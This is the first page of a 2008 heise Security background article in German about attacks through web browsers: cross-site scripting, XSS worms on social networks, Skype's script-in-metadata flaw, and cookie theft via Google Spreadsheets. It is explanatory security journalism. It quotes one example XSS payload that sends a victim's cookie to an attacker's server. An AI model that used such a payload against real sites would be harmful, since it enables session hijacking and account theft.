heise online Logo
Anmelden
Menü
  • c't – Magazin für Computertechnik
  • iX – Magazin für professionelle Informationstechnik
  • MIT Technology Review – Das Magazin für Innovation von Heise
  • c't Fotografie - Das Magazin rund ums digitale Bild
  • Mac & i – Nachrichten, Tests, Tipps und Meinungen rund um Apple
  • Make – Kreativ mit Technik
  • Alle Magazine im Browser lesen
IT News
  • Newsticker
  • heise Developer
  • heise Netze
  • heise Open Source
  • heise Security
Online-Magazine
  • heise+
  • Telepolis
  • heise Autos
  • TechStage
  • tipps+tricks
Services
  • Stellenmarkt heise Jobs
  • Weiterbildung
  • heise Download
  • Preisvergleich
  • Whitepaper/Webcasts
  • DSL-Vergleich
  • Netzwerk-Tools
  • Spielen bei Heise
  • Loseblattwerke
  • iMonitor
  • IT-Markt
Heise Medien
  • heise Shop
  • Abo
  • Veranstaltungen
  • Arbeiten bei Heise
  • Mediadaten
  • Presse
Anzeige Go! Schule morgen
Newsletter heise-Bot heise-Bot Push Nachrichten Push Push-Nachrichten
heise Security Logo
  • News
    • Archiv
    • 7-Tage-News
  • Hintergrund
  • heise Security Pro
    • FAQs zu heise Security Pro
  • Events
  • Kontakt
  1. Security
  2. Hintergrund
  3. Einfallstor Browser

Einfallstor Browser

Hintergrund 12.09.2008 12:04 Uhr Daniel Bachfeld
Inhaltsverzeichnis
  1. Einfallstor Browser
  2. Trickkiste
  3. Angriffe auf Router
  4. Angepinnt
  5. Same Origine Policy
  6. Auf einer Seite lesen

Herkömmliche Angriffe per infizierten Mail-Anhang und Schwachstellen in Windows haben fast ausgedient. Mit ausgefeilten Tricks versuchen Kriminelle Webseiten für ihre Zwecke zu missbrauchen - und zwar die, bei denen man am wenigsten damit rechnet.

"Erwarte das Unerwartete, sonst wirst du es nicht finden", wusste schon der griechische Philosoph Heraklit rund 500 Jahre vor Christi Geburt. Gerade in Bezug auf die Gefahren im Internet wird es immer wichtiger, sich auf Angriffe aus allen Richtungen gefasst zu machen. Selbst wer sich in Sicherheit wiegt, weil er nur auf bekannten, vermeintlich sicheren Seiten surft, ist nicht vor den Attacken der Internet-Mafia gefeit.

Lange Zeit galt: Wer keine Schmuddel- oder Tauschbörsenseiten ansurft, Online-Banking-Seiten nur über Bookmarks ansurft, keine ausführbaren Anhänge in Mails doppelklickt und stets alle Sicherheits-Updates für seinen Webbrowser installiert, hat wenig zu befürchten. Zudem lassen Sicherheitsfunktionen in Windows-Betriebssystemen wie Schutz vor Buffer Overflows, Speicherverwürfelung und Benutzerkontensteuerung unter Vista (User Account Control, UAC) viele herkömmliche Angriffe verpuffen. Doch die Cyber-Kriminellen liegen nicht auf der faulen Haut und denken sich immer neue Tricks aus, um trotzdem PCs unter ihre Kontrolle zu bekommen und Daten auszuspähen.

Im Wesentlichen sind die Ziele die gleichen geblieben: Diebstahl von Passwörtern, Kreditkartennummern und PINs und TANs sowie der Aufbau von Botnetzen. Um das zu erreichen, machen die Ganoven sich die Techniken zunutze, die dem Web zum Sprung auf Version 2.0 verholfen haben: Ajax, Flash und Konsorten. Zudem greifen sie immer öfter Anwendungen an, die bis dato nicht als typisches Einfallstor in den PC galten, etwa den lange Zeit als sicherheitsunkritisch eingeschätzten Adobe Reader oder Apples QuickTime.

Eines der größten Sicherheitsprobleme im Web ist seit einigen Jahren das so genannte Cross-Site-Scripting, bei dem Angreifer ihren Opfern präparierte JavaScripte im Browser unterschieben, um zu einer bestimmten Seite gehörige Zugangsdaten oder Cookies auszulesen und diese für ihre Zwecke zu missbrauchen. Die Schwierigkeit für den Angreifer lag bislang darin, sein JavaScript im Kontext der Seite ausführen zu lassen, von der er das Passwort begehrte (siehe Same Origine Policy]. Dafür musste er in der Regel eine Sicherheitslücke auf dem Server finden und einen präparierten Link mit eingebettetem Code an sein Opfer schicken, das diesen auch noch anklickte [1]. Ein typischer präparierter Link enthielt dann etwa folgenden Code: <script>document.location("http://cookie-klau.de/klau.cgi?"+document.cookie);</ script>;, um ein Cookie an den Server des Angreifers zu senden.

XSS-Wurm

Das Mitmach-Web mit seinen vielen Social-Networking, Foren- und Blog-Seiten macht die Sache für den Angreifer einfacher: Viele erlauben die Gestaltung eigener Seiten, teilweise mit aktiven Inhalten. So lässt sich der schädliche Inhalt direkt in den Seiten platzieren. Zudem muss ein Angreifer nicht mehr mit verdächtig aussehenden Links hantieren, es genügt, seinem Opfer einen Link zu einer Seite bei einem der großen, vermeintlich vertrauenswürdigen MyIrgendwas-Anbieter zu schicken.

XSS-Sniper
Mit dem XSS-Proxy xs-sniper sieht der Angreifer all das, was das Opfer gerade im Browser sieht.

Auf diese Weise fingen sich zuletzt mehrere hunderttausend Anwender der vornehmlich im südamerikanischen Raum genutzten Social-Networking-Seite Orkut einem JavaScript-Wurm ein, der sich von Nutzerprofil zu Nutzerprofil schlängelte. Selbst Anwendungen, bei denen man zunächst keinen direkten Kontakt mit Webseiten vermuten würde, sind für solche Attacken mit versteckt eingebettetem Code anfällig. So musste Skype den Zugriff seines gleichnamigen Clients auf die Videoportale Metacafe und MyVideo sperren, da Angreifer in die Meta-Daten der Videos Skripte einbetten konnten. Zur Darstellung der Videos nutzt Skype den Internet Explorer, der die JavaScripte zu allem Unglück auch noch im lokalen Kontext, also mit den höchsten Rechten, ausführte.

Weist der Webserver eine Schwachstelle auf, kann der Angreifer mittels Cross-Site-Scripting bösartiges JavaScript in den Browser des Anwenders schmuggeln und ausführen.

Da Cross-Site-Scripting mittlerweile epidemische Ausmaße erreicht, versuchen die großen Anbieter von Web-2.0-Seiten das Einbetten von aktiven Inhalten in ihre Nutzerseiten durch JavaScript-Filter und andere Maßnahmen zu verhindern. Allerdings fallen einzelne Funktionen immer wieder durch das Raster und bleiben ungeschützt. Auch Google hat des Öfteren mit Cross-Site-Scripting-Lücken auf Google-Mail und Google Docs zu kämpfen. Noch bis vor kurzem war es etwa bei Googles Spreadsheets möglich, in die Tabellenfelder JavaScript-Code hineinzuschreiben, der beim Aufruf durch andere eingeladene Nutzer deren Google-Cookie auslas. Da Google diensteübergreifend ein einziges Sitzungs-Cookie nutzt, hätte ein Angreifer dieses nach einem erfolgreichen Diebstahl zur Anmeldung an allen weiteren Anwendungen missbrauchen können.

Vorherige 1 2 3 4 5 Nächste

Forum bei heise online: Desktopsicherheit

Teile diesen Beitrag
https://heise.de/-270092 Drucken
Dienste
  • Security Consulter
  • Netzwerkcheck
  • Anti-Virus
  • Emailcheck
  • Krypto-Kampagne
Alerts! alle Alert-Meldungen

Jenkins-Plug-ins

IBM Spectrum Protect

Atlassian Jira

Zimbra / unrar

Anzeige
  • File Sharing im Job ohne Sicherheitsrisiko
  • Wie IT zu nachhaltigem Wirtschaften beitragen kann
  • Kundenservice mit künstlicher Intelligenz
  • Join the fundrace. Support open source!
  • Einheitliche Überwachung für hybride Clouds
Artikel

Utimaco, der Krypto-Miner und ein Disclosure-Desaster​

Auch Anbieter von Hochsicherheitslösungen sind vor Securityproblemen nicht gefeit. Man sollte sich vorbereiten, bevor man davon erfährt, sagt Jürgen Schmidt.

12 Kommentare
Aufmacher: Kommentar Welt-Passwort-Gedenktag

Kommentar: "Willkommen zum Welt-Passwort-Gedenktag"

Welt-Passwort-Tag: Jürgen Schmidt, Senior Fellow Security bei Heise, hat einen Kommentar aus einer Zukunft ohne Passwörter geschickt.

230 Kommentare
  • Passwortsicherheit – Alles, was Sie wissen müssen
  • Welt-Passwort-Tag: Zugangssicherheit im Fokus

Der Patch-Alptraum: Wenn schnell nicht schnell genug ist

Neben den überbewerteten Zero-Day-Lücken gibt es eine weniger bekannte Bedrohung durch "Beinahe-Zero-Days". Die sind weitverbreitet und brandgefährlich.

95 Kommentare

Neueste Forenbeiträge

  1. Permanentes Einloggen bei Vivaldi
    Hallo, irgendwie scheint der Passwortmanager nicht zu reagieren: schalte ich Vivaldi ein und aus muss ich dort wo ich mich unmittelbar zuvor…

    Forum:  Google wappnet Chrome gegen Spectre und 52 weitere Sicherheitslücken

    heidernein hat keinen Avatar
    von heidernein; vor 8 Stunden
  2. ESET-Lizenz "verloren"
    Moin, nach einiger Zeit habe ich meinen Stick mal wieder gestartet. Update von -p2 auf -p3 wurde installiert. WLAN-Passwort verloren, neu…

    Forum:  Desinfect

    GuinnessTrinker hat keinen Avatar
    von GuinnessTrinker; vor 12 Stunden
  3. Desktop ohne Symbole
    Hallo in die Runde, nach dem Start von Desinfect ist der Desktop komplett leer (keine Symbole oder Anzeigen). Das Menü auf der rechten…

    Forum:  Desinfect

    diggde hat keinen Avatar
    von diggde; vor 13 Stunden
News und Artikel
  • News
  • 7-Tage-News
  • News-Archiv
  • Hintergrund-Artikel
  • Alert-Meldungen
Service
  • Newsletter
  • Tools
  • Foren
  • RSS
  • mobil
Dienste
  • Security Consulter
  • Netzwerkcheck
  • Anti-Virus
  • Emailcheck
  • Krypto-Kampagne
  • Datenschutz
  • Cookies & Tracking
  • Impressum
  • Kontakt
  • Barriere melden
  • Mediadaten
  • Verträge kündigen
  • 244692
  • Content Management by InterRed
  • Hosted by Plus.line
  • Copyright © 2022 Heise Medien